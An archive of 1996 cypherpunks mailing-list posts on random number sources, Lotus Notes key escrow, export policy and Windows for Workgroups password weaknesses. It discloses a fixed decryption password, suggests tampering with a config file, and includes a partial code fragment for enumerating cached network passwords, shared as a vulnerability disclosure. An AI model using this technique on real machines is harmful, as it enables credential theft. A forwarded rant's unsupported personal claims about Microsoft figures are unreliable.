From whom? Just imagine a spy porting a radiating gun and pointing it
to your detector.

Also, the technology used is normally electromagnetical. One could think
of a method to storm a detector with a em field... thus reducing randomness.
The point is: since you don't notice these fields or radiations, you are
prone to fall in the trap: one gets used to rely on the technology 'cos
it always works, and when the day comes since you don't notice anything unusual
you don't suspect anything wrong. Your detector may be overloaded and only
outputs zeros for a while and you won't notice anything wrong.

>RNGs based on thermal noise and natural radioactivity have been discussed
>on our list at least a dozen times (multiple posts each time), so I suggest
>further research be done there.
>
>--Tim May

	This sounds to me more like the way to go: you need to rely on
something of which you have full control. Either a RNG function or something
that can not be tampered without you noticing. It would be very difficult
to produce big changes in temperature without you noticing... Though still
you are left with electromagnetic interferences on the detector.

	My view is that what is needed is something that a) you can fully
control or b) nobody can control/interfere/mimic in any way.

	In this sense, my point of view is: anything that can be influenced
from the outside is not reliable. This means you need something that's
totally inside and controlable. It should be fairly random, and not able to
be influenced from the outside. And possibly originate its own electrical
current which is not dependable on external influences of any type. Specially
electrical/radiation influences. It should be easy to monitor and difficult
to tamper with temporarily (so that tampering could pass unnoticed).

	The only thing I can think of is a biological source converting
chemical products into random electrical data. Biological sources are
very difficult to influence rapidly (other than by death which is
irreversible), they can't be switched on/off, their range of values is
always bounded to physiological limits (i.e. the only way to "overload"
them is by killing them or some other drastical and evident measure), have
normally a strong resilience to external influences, and as long as you
can keep an eye on them, you can remain sure they are alive and not 
horribly sick. And finally, if you are the source, then you have the 
highest availability possible and the fullest control.

	You could measure the changes in charge induced by a electrical
fish as it swims. Or changes in conductivity of some plant/animal tissues. Or
have a culture of electrical microorganisms. Or just use your own
electroencephalogram with the appropriate corrections to remove waves.
There are also some biological processes whose production is intrinsically
random. Things like some biochemical cycles, or some muscle movements.
It's all a matter of finding the best one(s) according to randomness and
ease of measure. And you can always combine several sources.

	There are even some studies already done about the randomness
of different biological processes, their predictability and to which
extent they can be influenced. The technology to measure most of them
is already well developed and highly reliable. It's all a matter of
adapting it to a new use.

	Just my 2c.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut01@cs.auckland.ac.nz
Date: Wed, 17 Jan 96 19:15:22 PST
To: llurch@networking.stanford.edu
Subject: A WfW security curiosity (possibly another security hole)
Message-ID: <199601180314.QAA19064@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


When WfW is installed, it creates a file in the Windows directory called
WFWSYS.CFG.  This is a standard Windows password file and may be decrypted with
the password "23skidoo" (note that this is lowercase, since it's passed to the
.PWL-handling code at a level which bypasses the usual password case smashing.
The mangled 32-bit form which is passed to the RC4 key setup routine is { 0x67,
0x6F, 0xE3, 0x81 }).
 
WFWSYS.CFG seems to be mostly identical for the few copies I could get to, and
WfW networking won't work without it.  Decrypting the file doesn't seem to give
anything useful, the string "SYSTEM" and what looks like a few 8 or 16-numbers. 
I don't know enough about how WfW networking works, but my (very vague) guess
is that it contains some sort of cookie to uniquely ID each machine for
resource sharing over a network.  If it does then it it's (yet another) pretty
serious security hole, since it's encrypted with a fixed password and seems to
be mostly identical over multiple machines.  OTOH it may be something to do
with serial numbers so you can't install the same copy of WfW on multiple
machines on a LAN.
 
Can anyone shed more light on it?
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Makrecky" <Steve_Makrecky@msn.com>
Date: Thu, 18 Jan 96 11:24:40 PST
To: cypherpunks@toad.com
Subject: Keyboard emulation
Message-ID: <UPMAIL08.199601181923530065@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Looking for a design of a keyboard & mouse emulator.  What I would like to do 
is control a main computer's keyboard and mouse functions by a second RS232 
remote IBM PC.  Has anybody tried this?  Do you foresee any problems?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 18 Jan 96 19:46:31 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Blacknet & Lotus Notes
Message-ID: <v02120d05ad24ae82b3eb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:13 1/18/96, Adam Shostack wrote:
[...]
>        So...Is Notes V4 shipping yet?  Do we know how many bits of
>key we're after?  (NB: I'm assuming that (some part of) the US
>government has an RSA private key which is used to encrypt the 24 bits
>of GAK'd key.)

What I would like to know is which agencies have the key. Any hard info?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 18 Jan 96 19:42:49 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: PARTY-PARTY-PARTY
Message-ID: <Pine.SUN.3.91.960118191945.4039A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

You are all invited to the party I am having on 10 February.
Instead of using old-fashioned e-mail to give you the details,
I'm using a Web page donated by co-host Sameer.  Check it out:

		http://www.c2.org/party/masquerade/html

By the time you read this, there should be a map on the page.
If not, try back in a day or two.  If you do not have a browser,
send me e-mail and I'll send you an ASCII invitation.

Cheers,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Jan 96 20:33:41 PST
To: cypherpunks@toad.com
Subject: The I Bomb
Message-ID: <199601190433.XAA09367@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A&E presents this week the BBC Horizons show, "The I Bomb," 
featuring Tim May smart-bombing various brass and infowar 
chicken littlers.


It also shows an SAIC wizard sniffing a system to plant evil 
polymorphous code a la Shimomura -- presaging the recent GNN 
report on NSA's net traps.

----------


From: http://www.aetv.com


    A&E 
     
_________________________________________________________________

   
     Series: Voyages.
     
     The I-Bomb.
     
     A look at how information--not bombs--is becoming the most 
important
     weapon in war. Includes interviews with top U.S. military
     strategists and futurists Alvin and Heidi Toffler.

     Duration: 1 hour

     DateTime
 
     Thursday1/18  10pm [EST, presumably, since the show just 
finished] 

     Friday1/19   2am 

     Saturday1/20  11am
       
_______________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut01@cs.auckland.ac.nz
Date: Thu, 18 Jan 96 07:19:02 PST
To: gaffney@emba.uvm.edu
Subject: Re: A WfW security curiosity (possibly another security hole)
Message-ID: <199601181518.EAA17585@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>>[WFWSYS.CFG file]
>
>This is the file used by admincfg.exe (on WFW3.11 disk 8). This file
>contains "security" settings, such as whether or not to cache passwords
>on disk (*.PWL files). 
 
Ahh, so you can silently reenable password cacheing by manipulating this 
file, thereby defeating Microsoft's "turn off password cacheing" kludge.  
Wonderful.  I'll have a poke around on Monday to figure out what bits to
flip and post the results here.
 
Thanks for the info...
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 19 Jan 96 00:21:43 PST
To: cypherpunks@toad.com
Subject: Re: CryptoAPI and export question
Message-ID: <199601190811.IAA01481@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 1/17/96 -0800, Lucky Green wrote:

>So the main thing that the new MS CSP accomplishes is to establish a
>standard that will prevent foreigners at the OS level from using real
>crypto with popular applications. Way to go Microsoft.

It seems to me that Microsofts plan is carefully and ingeniously
designed to fail:  They will do their best to restrain the export 
of real crypto, but alas, in the end, they will regretfully admit
that they failed.  Some evil person will have illegally exported 
real crypto after they signed it. Too bad.  How sad.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phorgan@broadvision.com (Patrick Horgan)
Date: Fri, 19 Jan 96 13:25:34 PST
To: cypherpunks@toad.com
Subject: What's a good math text?
Message-ID: <9601192124.AA27738@star.broadvision.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not on the list just now, my work won't allow me the time to follow it.
I'm still just as interested in cryptography though, and would like
y'all to email me recommendations on good math books that will give me
the background to understand the papers in the field.  I'm sure that will
include a good numbers theory text.  If a beginner at number theory
would have a hard time understanding it, please recommend background
texts as well:)  What else would I need?  My computer science texts
explain complexity theory well, what would I need in information theory.
What would I have to read to understand factoring complexity?  Are there
any new texts that cover the recent breakthroughs in factoring?

Thanks:)

Patrick
Patrick J. Horgan         Broadvision Inc.
phorgan@broadvision.com   333 Distel Circle          Have horse
Phone : (415)943-3677     Los Altos, CA 94022-1404   will ride.
FAX   : (415)934-3701  Opinions mine, not my employers except by coincidence.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Fri, 19 Jan 96 14:01:20 PST
To: cypherpunks@toad.com
Subject: WSJ: IBM Corp. Compromises On Encryption Keys (fwd)
Message-ID: <199601192200.OAA08481@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


You might want to disregard the paranoid, irrelevant head and tail, but
the included article is very good, especially considering the establishment
source. Nice headline, for the WSJ.

Forwarded message:
> Have you heard of problems with the equations that Excel 95 generates when
> using the trendline analysis function in a chart? 

I haven't seen this, but because of all the math stuff on my web, I'm 
getting both phone calls and a lot of odd math feed back. We think we do 
have a real carry bit error between the Win 3.x and Win95. Some of the 
data I've reviewed is pretty scarry. Microsoft lost a lot of their older 
programmers over the past 3 years. It was literally an Exodis out. Now 
they have a lot of people that can't read the old code and this is a real 
mess. They also can't get anyone with much experience to work there. Here 
in Redmond good people just stay away. 

I saw this article today in Dow Jones and thought it might shed some 
light on the security issues.  I know what MS's 10 year strategy was
from 1990. Steve Ballmer is  the one making all the decisions on 
international markets. It's his baby. When I read this about IBM and 
Lotus all I could think of was Steve ordering the guys to make something 
exceptable for their license by the FED so they could gain market share 
over their competitors. This is just who he is. He doesn't understand the 
techincal issues and hasn't listened to Gates in years. MS is pretty 
thick with DC and must pay off lots of people there. That is what they 
were doing when I worked for their government group. It's weird working 
with the FED. They are all into their power groups. AND they are very low 
tech. I swear the FED is scrapping the bottom of the technical pool. The 
FBI is the worse. 
------------------------------------

1/18/96 IBM Corp. Compromises On Encryption Keys

By Thomas E. Weber
  Staff Reporter of The Wall Street Journal
  NEW YORK -- International Business Machines Corp., caving in
to intense government pressure, agreed to include a special key
that helps investigators tap into data messages in return for
permission to export a more-secure version of its Lotus Notes
software.
  The U.S. has prevented software makers from exporting
sophisticated encryption technology for fear that terrorists and
other criminals would gain access to a snoop-proof
communications system. Industry observers said IBM's move marked
the first time a supplier agreed to give the government special
access to its software's security code.
  But other companies also are negotiating with the government
to find ways around export restrictions. Microsoft Corp., for
example, has been seeking industry support for a new scheme that
separates encryption technology from application programs so
that those products don't need export licenses.
  Encryption keys have stirred the concern of privacy experts in
the past. While IBM's Lotus Development Corp. software unit
defended the move as a stopgap compromise until a broader
agreement on data security can be reached, Notes creator Ray
Ozzie clearly found the controversial plan somewhat distasteful.
  "We were desperate enough to try to negotiate a short-term,
pragmatic solution," Mr. Ozzie said. "But we do not believe this
is the right long-term solution."
  One privacy advocate would agree. "The irreducible fact is
that foreign customers are reluctant to rely on security
products that have been compromised in some way" by federal
intelligence agencies, said Mike Godwin, staff counsel for the
Electronic Frontier Foundation.
  Several years ago the government proposed the "Clipper"
computer chip that was programmed to let investigators tap into
phone calls and data messages transmitted digitally. While that
plan died after privacy advocates accused the government of
trying to spy on users, the idea of leaving a back door open for
government agents has remained alive.
  Under the Lotus plan, government investigators would still
need to employ sophisticated code breaking to read messages sent
via Notes software, which lets users at different computers
collaborate. Security software encrypts information by using a
unique key of software code. The length of a key is measured in
computer bits, and longer keys are better -- they're more
complex and more difficult for wouldbe spies, not to mention
government agents, to unravel.
  Until now, to obtain an export license for Notes, Lotus has
been restricted to an encryption system of 40 bits in its
international version. Domestic users have been permitted to use
a higher-level, more-secure 64-bit system.
  The new overseas version of Notes, tagged Release 4, will give
foreign users 64-bit security. But to get permission to export
the software, Lotus agreed to give the government access to 24
of those bits by using a special 24-bit key supplied by the
National Security Agency.
  (END) DOW JONES NEWS 01-18-96
   6 02 A 

---------------------------- 

Gates is the kind of person who will do just what they want if he gets
dicked with. He'll have a ranting fit (Gates is a functional autist) about
how stupid it is and then he will just get eccentric and say, give them
what they want with a grin. He is still a hacker at the core. You
understand the problem here. The FED is making them use lower security and
then patting them on the back and buying their products for our own
government and militery.  Gates use to brag that he would crash the fed. I
really believe he is still trying. NO ONE hates the FED more than GATES!
He was a page in DC at 17 and got a good taste of our government. I've had
it with these people too. DC is so discusting. All these attorneys who
don't know shit about anything but words and lying... 

Hey, I updated my web... : ) To day I filed an appearance in court and
fired my attorney. I'm still being dicked with here. If I don't look both 
way when I cross the street, I get busted. This week it was an unwanted 
touch. I touched someone's shopping bag getting into my car. Next week 
its an non-contact order by my daughter's guidence counselor. She 
considers a phone call from me about my daughter's possible college 
programs a threat! When I got the complaint it was totally nuts. 
Everything she knows about me is based on gossip. It reads like total 
hysteria. The way Microsoft has attempted to play me locally is really  
amazing. I was 40 when this started. Never had a problem before that. 
So when I say, 'Watch your back!' I mean it. : )

J~ http://www.halcyon.com/redrose/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 18 Jan 96 19:40:23 PST
To: ecarp@netcom.com
Subject: Re: Attack Simulator
In-Reply-To: <199601190129.UAA22928@dal1820.computek.net>
Message-ID: <199601190337.OAA09829@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> ISS and SATAN are different tools.  There is a non-commercial version of ISS available.  ISS didn't
> get as much notice as SATAN - I guess it's because it's author isn't as widely known as Dan Farmer. 
> --

Err, no its just because ISS is called ISS. Though if Klaus was into
B&D, bisexuality, gutter philosophy courses, exhibitionism and tight
blank pants perhaps it/he would be better known. Wadda you reckon Klaus?
Could this be the new you :)?

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Jan 96 15:09:33 PST
To: cypherpunks@toad.com
Subject: Code demonstrating Microsoft Windows insecurity on networks (fwd)
Message-ID: <Pine.ULT.3.91.960119142610.468I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


What "anonymous" said (below). I had permission to forward this, but I
figured it might attract more interest if it were "anonymous" to people
who can't read headers. 

Almost two months after Peter and Frank demonstrated that it was untrue,
and one month and five days after Microsoft "significantly improved"
Windows 95 by providing a patch for the exact same algorithm, Microsoft
this very second still says that the .PWL algorithm as used in Windows for
Workgroups is secure. 

 http://www.microsoft.com/kb/peropsys/windows/q90271.htm

This article will also be included on thousands of copies of the February
TechNet CD-ROM. 

Other Knowledge Base articles have been corrected in less than a day.

Yusuf's statement that my January 16th email is the first that he had
heard of the .PWL problem is both patently ridiculous and directly
contradicted by private email from anonymous sources on this list whom
T. C. May has killfiled. 

In other news, the international versions of the SMB and C$ bug fixes
exploited by Samba and Paul Brainard were finally posted today (as usual,
they're dated yesterday). So the non-US public shares listed on, for
example, www.winserve.com no longer have to be completely open to everyone
on the Internet. Yusuf Mehdi, the Windows 95 Product Manager, had told me
on November 9th that these internationalized patches would be posted
"within two weeks." No excuse for this two-month delay has been offered. 

Yusuf also, well, lied on November 9th when he said that Microsoft had
"sent mail to the newsgroups" retracting their statement that the SMB bug 
was caused by Samba sending "illegal network commands," and clarifying 
that the patches dated October 20th only work on US/English versions of 
Windows 95.

The original Microsoft announcement as released to the media and WinNews 
is at: 

 gopher://quixote.stanford.edu/0R593020-600291-/win95netbugs

The current version, which contrary to Yusuf's statements on November 9th 
does not indicate that there has been any change, is at:

 http://www.microsoft.com/windows/software/w95fpup.htm

By the way, MSN is going to allow access via TCP/IP soon. Let's make sure
they do it securely. 

-rich

---------- Forwarded message ----------
Newsgroups: comp.security.misc,comp.os.ms-windows.nt.admin.networking,alt.security,comp.os.ms-windows.networking.windows,comp.os.ms-windows.programmer.networks
Path: nntp.Stanford.EDU!news.Stanford.EDU!nntp-hub2.barrnet.net!newsfeed.internetmci.com!nuclear.microserve.net!luzskru.cpcnet.com!not-for-mail
From: anonymous@alpha.c2.org
Subject: Code demonstrating Microsoft Windows insecurity on networks
Sender: rich@infinity.c2.org
Message-ID: <4dnmcu$pt4@infinity.c2.org>
Date: 19 Jan 1996 00:57:02 -0800
Organization: http://www.c2.org/hackmsoft/
Summary: Cypherpunks share code
Lines: 210

Just a little something to hurry this liar up:

Received: from tide10.microsoft.com (firewall-user@tide10.microsoft.com 
[131.107.3.20]) by infinity.c2.org (8.7.1/8.6.9) with SMTP
        id JAA14902 for <hackmsoft@c2.org>; Tue, 16 Jan 1996 09:07:26 -0800 
(PST)
        Community ConneXion: Privacy & Community: <URL:http://www.c2.org>
Received: by tide10.microsoft.com; id JAA00999; Tue, 16 Jan 1996 09:28:16 -0800
Received: from unknown(157.54.17.74) by tide10.microsoft.com via smap (g3.0.3)
        id xma000913; Tue, 16 Jan 96 09:27:48 -0800
Received: from xnet2 (xnet2.microsoft.com [157.54.17.205]) by 
imail2.microsoft.com (8.7.1/8.7.1) with SMTP id JAA02991 for 
<hackmsoft@c2.org>; Tue, 16 Jan 1996 09:15:28 -0800 (PST)
X-Received: from xmtp4 by xnet2 with receive; Tue, 16 Jan 1996 09:12:22 -0800
X-Received: from RED-02-IMC by xmtp4 with recvsmtp; Tue, 16 Jan 1996 09:08:41 
-0800
Received: by red-02-imc.itg.microsoft.com with Microsoft Exchange (IMC 
4.22.611)
        id <01BAE3F2.39A25280@red-02-imc.itg.microsoft.com>; Tue, 16 Jan 1996 
09:08:39 -0800
Message-ID: 
<c=US%a=_%p=msft%l=RED-72-MSG-960116170828Z-11006@red-02-imc.itg.microsoft.com>
From: Yusuf Mehdi <yusufm@microsoft.com>
To: Rich Graves <llurch@networking.stanford.edu>,
        Yves Michali <yvesm@msg.microsoft.com>
Cc: "pgut01@cs.auckland.ac.nz" <pgut01@cs.auckland.ac.nz>,
        "hackmsoft@c2.org" <hackmsoft@c2.org>,
        Robert Bennett
         <rbennett@msg.microsoft.com>,
        Michael Ahern <mikeah@msg.microsoft.com>,
        Russell Stockdale <rust@msg.microsoft.com>
Subject: RE: Need confirmation of Win95 password encryption back door (fwd)
Date: Tue, 16 Jan 1996 09:08:30 -0800
X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.22.611
Encoding: 204 TEXT
X-MsXMTID: xmtp4960116170841RECVSMTP[01.52.00]000000fb-49231

Rich,

Thanks for your email.  This is the first I've seen of your email.  I'm 
forwarding to Mike Ahearn who will handle any issues.  If we have outdated 
information in the knowledge base, I apologize and we will certainly correct 
asap.  Mike will investigate and let you know the outcome.  As always we 
appreciate your feedback.

Yusuf

----------
From:   Rich Graves[SMTP:llurch@networking.stanford.edu]
Sent:   Tuesday, January 16, 1996 5:06 AM
To:     Yusuf Mehdi; Yves Michali
Cc:     pgut01@cs.auckland.ac.nz; hackmsoft@c2.org
Subject:        Re: Need confirmation of Win95 password encryption back door 
(fwd)

[A reply to a cypherpunks post]

Peter, I'm forwarding this to the Windows 95 Product Manager, who does not
seem to be taking this at all seriously, and Bcc'ing it to the technically
knowledgeable reporters I mentioned in my other message and to four
Microsoft engineers who have sent me mail, two of them on condition of
anonymity (at least one of whom fears management reprisals). I don't see
any particular reason to tell Microsoft everyone I am talking to,
especially since they have been less than completely honest with me. 

Yusuf, please ask the Windows for Workgroups group to at least acknowledge
the .PWL encryption bugs they have known about since at least November
29th, correct the Knowledge Base articles that explain how secure .PWL
files are, and let the public know whether they have any plans to fix
these bugs and fundamental architectural weaknesses. 

To put this more succinctly, the below, from Q90271, is complete bullshit,
and you know it.

  The password list file is encrypted with an algorithm that meets the U.S.
  government Data Encryption Standard (DES). This encryption technology is
  the highest security allowed in software exported from the United States.
  The odds of breaking the encryption algorithm are less than those for
  random guesses of what the password might be.

If you don't spread the word, we will. All it takes is a couple of free
hours on CompuServe, America Online, Prodigy, Delphi, and the Microsoft
Network, not to mention the Internet itself. Right now, my mailing list
has 600 serious network managers in 20 countries, and my Web site gets
about 1,000 hits per day (that's the main site; there are also mirrors in
Russia, the UK, and Australia). 

-rich

---------- Forwarded message ----------
Date: Wed, 17 Jan 1996 01:15:20 +1300 (NZDT)
From: pgut01@cs.auckland.ac.nz
To: llurch@networking.stanford.edu
Subject: Re: Need confirmation of Win95 password encryption back door

>A Major Media Outlet requires confirmation that Windows 95, to facilitate 
its
>automatic reconnect feature for sleeping laptops and temporary network
>outages, caches all network passwords (NetWare, NT, UNIX running Samba,
>SLIP/PPP dialup) in unprotected memory in clear text, whether you've 
disabled
>persistent "password caching" to disk and applied the December 14th 128-bit
>RC4 .PWL patch, or not. There seems to be no way to turn this off.
 
Would you like me to confirm it for WfW?
 
Actually you can problably do it for Win95 by removing the password file 
after
the initial connect.  If Win95 can reconnect with the password file missing,
then the passwords are still in memory.  You'll have to be careful though to
make sure they're not being read from the Windows disk cache, loading Word 
in
between killing the connection and trying to reconnect should clear the
password file from the cache.
 
>So, anyone have Win95 and some time to kill, or can anyone recommend a good
>DOS/Windows RAM grepper?
 
Given that the descriptor tables are apparently unprotected in Win95 (which 
is
pretty incredible), it shouldn't be too hard to get access to all of memory
>from  a user process.  In any case a VxD should be able to grep all of memory 
in
the background without the user even being aware of it.
 
>We know that this vulnerability exists in Windows for Workgroups, and Peter
>wrote a little demo (on hackmsoft page below, without source), but the APIs
>appear to have changed in Win95.
 
Sorry about the delay in getting this to you, as I mentioned before it was 
on a
machine a fair way away, stuck behind a firewall.  I haven't included all 
the
SMTP stuff and whatnot because there's quite a bit of it and it's boring, 
the
routines which do all the work are the following...
 
This is the function called by WNetEnumCachedPasswords() to enumerate each
password:

[*CODE DELETED*]
    /* Record the password information */
[*CODE DELETED*]
    /* Signify that we want to move to the next entry */
[*CODE DELETED*]

This is the function which actually does the enumeration.  The for() loop
defines what resources you want to get passwords for.

[*CODE DELETED*]
    /* Get the proc. address of the password manipulation function */
[*CODE DELETED*]
    /* Enumerate the passwords */
[*CODE DELETED*]

To find out (for example) what disk drive resources you're using:
 
    /* Check each drive to see if it's a network resource */
    for( driveNo = 2; driveNo < 26; driveNo++ )
        if( GetDriveType( driveNo ) == DRIVE_REMOTE )
            {
            char password[ 100 ], resource[ 100 ];
            char *driveName = "x:";
            WORD passwordLength = 100, resourceLength = 100;
            BYTE resourceNo;
            int i;
 
            /* Find the name of the network resource for this drive number 
*/
            *driveName = 'A' + driveNo;
            WNetGetConnection( driveName, resource, &resourceLength );
            }
 
This code should be modifiable by anyone to get any password for any 
resource.
I'll leave it to you to decide how much to publish, the worry is that if you
publish all of it people will whine about it helping hackers.  Might I 
suggest
something like:
    /* Get the proc. address of the password manipulation function */
    WNetEnumCachedPasswords = ( LPWNETENUMCACHEDPASSWORDS ) \
                                GetProcAddress( WNetGetCaps( 0xFFFF ), \
                                                MAKEINTRESOURCE( 
ORD_WNETENUMCACHEDPASSWORDS ) );
    if( WNetEnumCachedPasswords == NULL )
        exit( EXIT_FAILURE );
 
    /* Enumerate the passwords for the resources we want.  This only gets 
the
       first password, in practice we'd keep calling 
WNetEnumCachedPasswords()
       until the enumPasswordProc() tells us (via the returned status) to 
stop,
       then move on to the next resource */
    for( resourceNo = START_RESOURCE; resourceNo <= END_RESOURCE; 
resourceNo++ )
        status = ( *WNetEnumCachedPasswords )( "", 0, ( BYTE ) resourceNo, \
                                               enumPasswordProc );
 
This shows how simple it is, but doesn't give people something they can just
cut and paste into their own code to get something which will give them all
passwords.  You may want to include the "find drive resources" code fragment 
as
well as an example of how to do this, although it's not really necessary.
 
Feel free to forward this to whoever you think is appropriate, although it's
probably best not to give the get-any-password capable version to the 
masses.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 19 Jan 96 14:17:37 PST
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
Message-ID: <199601192214.RAA28470@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601190610.RAA17232@sweeney.cs.monash.edu.au>,
Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
> > Hack Lotus?  Please do.
> 
> I have no idea how Lotus actually does this, but:
> 
> How about a salt determined by the forty bit part?
> 
> Ie if the key is s.g (s=secret, g=gaked), the BARF (="Big-brother Access
> Required Field") could contain Encrypt(Hash(s).g,BigBrother).
> 
> The receiving end, knowing both s and g, could re-calculate the
> BARF and only function when it's correct. Unless it's been hacked too,
> in which case it could barf when the BARF is correct :-)

Looks good to me -- I think that should work.

I guess that goes to show my lack of creativity. :-)

I was talking to Avi Rubin from Bellcore last night, and he speculated
that maybe the 64 bit key was a fixed one, generated once at installation
time and escrowed with the government then.

With a fixed pre-escrowed key, the receiver wouldn't have to do any
checking; and it would obviate the need for a LEEF/BARF/... field.
On the other hand, it seems to me like one should be able to disable
this fixed pre-escrowed key mechanism with a little binary patch.

I guess we need hard technical details.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQAXySoZzwIn1bdtAQFQxgF/d72pj3qiRVIxCBPvhBEsLwWtTiO9tibv
HEa8VbFTwMWoWY70XAMd8meFG5ktMRob
=8JMW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Fri, 19 Jan 96 14:33:57 PST
To: cypherpunks@toad.com
Subject: Re: Keyboard emulation
Message-ID: <9600198220.AA822098037@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Steve,
     
     Yes, it's called PC Anywhere by Symantic
     
     MGD


______________________________ Reply Separator _________________________________
Subject: Keyboard emulation
Author:  "Steve Makrecky" <Steve_Makrecky@msn.com> at Internet-USA
Date:    1/18/96 7:21 PM


Looking for a design of a keyboard & mouse emulator.  What I would like to do 
is control a main computer's keyboard and mouse functions by a second RS232 
remote IBM PC.  Has anybody tried this?  Do you foresee any problems?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 19 Jan 96 15:16:13 PST
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
In-Reply-To: <199601192214.RAA28470@bb.hks.net>
Message-ID: <9601192315.AA08094@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I've been thinking about how I would do the lotus hack. I certainly would not be 
wanting to do a public key operation for the benefit of the government on every 
message. How about the following:

During installation of program:

Select a random key ER, encrypt it under the govt. public key to give Eg(ER).

To start encrypting,

chose a random value R, encrypt under destination public key to give Ek(R)

set 40 bits of R to 0 to produce R'

Encrypt R' under ER to give E-ER(R')

Hash R, E-ER(R') and Eg(ER) with a one way function (MDMF like) to produce the 
actual key.

Send across Ek(R), E-ER(R'), Eg(ER)

To decrypt the message one needs the information for the escrow authority.

		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 19 Jan 96 17:03:17 PST
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: CelBomb
In-Reply-To: <doug-9600161914.AA002018317@netman.eng.auburn.edu>
Message-ID: <Pine.SUN.3.91.960119200112.13608B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jan 1996, Doug Hughes wrote:

> 
> Just FYI:
> 
> Time has a different twist on the entire story than the 'trusted
> compatriot hands over rigged phone' story that has been the basis
> for comment around here.

Is it any mystery that of the four publications quoted on the list, there 
are four different versions of the event?

"Sources and Methods" ya know.


> --
> ____________________________________________________________________________
> Doug Hughes					Engineering Network Services
> System/Net Admin  				Auburn University
> 			doug@eng.auburn.edu
> 		Pro is to Con as progress is to congress

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Sat, 20 Jan 96 07:59:51 PST
To: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Subject: Re: Random Number Generators
In-Reply-To: <0kzHl6200bky0_dkQ0@andrew.cmu.edu>
Message-ID: <Pine.3.89.9601200739.A10562-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


You might find this article instructive:  Herschell F. Murry, "A General 
Approach for Generating Natural Random Numbers," IEEE Transactions on 
Computers, December 1970, p. 1210.

A fairly recent patent uses your approach of two oscillators:  No. 
